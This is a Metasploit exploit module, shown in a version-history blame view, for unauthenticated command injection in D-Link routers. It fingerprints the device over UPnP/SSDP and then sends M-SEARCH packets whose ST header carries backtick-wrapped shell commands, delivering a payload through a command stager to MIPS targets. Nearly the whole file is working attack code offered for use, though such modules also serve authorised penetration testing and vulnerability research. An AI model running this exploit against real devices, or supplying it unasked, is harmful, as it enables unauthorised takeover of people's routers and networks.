metasploit-framework/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb

150 lines
4.2 KiB
Ruby
Raw Normal View History

2014-06-16 20:12:15 +00:00
##
# This module requires Metasploit: http://metasploit.com/download
2014-06-16 20:12:15 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2014-07-11 14:35:21 +00:00
Rank = ExcellentRanking
2014-06-16 20:12:15 +00:00
2014-07-08 19:58:15 +00:00
include Msf::Exploit::CmdStager
2014-06-16 20:12:15 +00:00
def initialize(info = {})
super(update_info(info,
2014-07-11 14:35:21 +00:00
'Name' => 'D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection',
2014-06-16 20:12:15 +00:00
'Description' => %q{
Different D-Link Routers are vulnerable to OS command injection via UPnP Multicast
2014-07-13 11:24:54 +00:00
requests. This module has been tested on DIR-300 and DIR-645 devices. Zachary Cutlip
2014-06-16 20:12:15 +00:00
has initially reported the DIR-815 vulnerable. Probably there are other devices also
affected.
},
'Author' =>
[
'Zachary Cutlip', # Vulnerability discovery and initial exploit
2014-07-11 14:17:34 +00:00
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module and verification on other routers
2014-06-16 20:12:15 +00:00
],
'License' => MSF_LICENSE,
'References' =>
[
2014-07-11 14:17:34 +00:00
['URL', 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection'], # original exploit
['URL', 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html'] # original exploit
2014-06-16 20:12:15 +00:00
],
'DisclosureDate' => 'Feb 01 2013',
'Privileged' => true,
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
2014-07-11 14:17:34 +00:00
[ 'MIPS Big Endian', # unknown if there are big endian devices out there
2014-06-16 20:12:15 +00:00
{
'Platform' => 'linux',
'Arch' => ARCH_MIPS
}
2014-07-11 14:17:34 +00:00
]
2014-06-16 20:12:15 +00:00
],
'DefaultTarget' => 0
))
2014-07-11 14:17:34 +00:00
2014-06-16 20:12:15 +00:00
register_options(
[
Opt::RHOST(),
2014-07-11 14:17:34 +00:00
Opt::RPORT(1900)
2014-06-16 20:12:15 +00:00
], self.class)
2014-07-11 14:17:34 +00:00
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
2014-06-16 20:12:15 +00:00
end
2014-07-02 19:24:50 +00:00
def check
configure_socket
pkt =
"M-SEARCH * HTTP/1.1\r\n" +
"Host:239.255.255.250:1900\r\n" +
"ST:upnp:rootdevice\r\n" +
"Man:\"ssdp:discover\"\r\n" +
"MX:2\r\n\r\n"
udp_sock.sendto(pkt, rhost, rport, 0)
res = nil
1.upto(5) do
res,_,_ = udp_sock.recvfrom(65535, 1.0)
2014-07-11 14:17:34 +00:00
break if res and res =~ /SERVER:\ Linux,\ UPnP\/1\.0,\ DIR-...\ Ver/mi
udp_sock.sendto(pkt, rhost, rport, 0)
2014-07-02 19:24:50 +00:00
end
2014-07-02 19:28:39 +00:00
# UPnP response:
# [*] 192.168.0.2:1900 SSDP Linux, UPnP/1.0, DIR-645 Ver 1.03 | http://192.168.0.2:49152/InternetGatewayDevice.xml | uuid:D02411C0-B070-6009-39C5-9094E4B34FD1::urn:schemas-upnp-org:device:InternetGatewayDevice:1
# we do not check for the Device ID (DIR-645) and for the firmware version because there are different
# dlink devices out there and we do not know all the vulnerable versions
2014-07-02 19:24:50 +00:00
if res && res =~ /SERVER:\ Linux,\ UPnP\/1.0,\ DIR-...\ Ver/mi
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Unknown
end
2014-06-16 20:12:15 +00:00
def execute_command(cmd, opts)
configure_socket
pkt =
"M-SEARCH * HTTP/1.1\r\n" +
"Host:239.255.255.250:1900\r\n" +
"ST:uuid:`#{cmd}`\r\n" +
"Man:\"ssdp:discover\"\r\n" +
"MX:2\r\n\r\n"
udp_sock.sendto(pkt, rhost, rport, 0)
end
def exploit
2014-07-14 18:29:07 +00:00
print_status("#{peer} - Trying to access the device via UPnP ...")
2014-07-02 19:24:50 +00:00
unless check == Exploit::CheckCode::Detected
2014-07-14 18:29:07 +00:00
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
2014-07-02 19:24:50 +00:00
end
2014-07-14 18:29:07 +00:00
print_status("#{peer} - Exploiting...")
2014-06-16 20:12:15 +00:00
execute_cmdstager(
2014-07-08 19:58:15 +00:00
:flavor => :echo,
2014-06-16 20:12:15 +00:00
:linemax => 950
)
end
# the packet stuff was taken from the module miniupnpd_soap_bof.rb
# We need an unconnected socket because SSDP replies often come
# from a different sent port than the one we sent to. This also
# breaks the standard UDP mixin.
def configure_socket
self.udp_sock = Rex::Socket::Udp.create({
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
})
add_socket(self.udp_sock)
end
2014-07-14 18:29:07 +00:00
# Need to define our own rhost/rport/peer since we aren't
# using the normal mixins
2014-06-16 20:12:15 +00:00
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
2014-07-14 18:29:07 +00:00
def peer
"#{rhost}:#{rport}"
end
2014-06-16 20:12:15 +00:00
# Accessor for our UDP socket
attr_accessor :udp_sock
end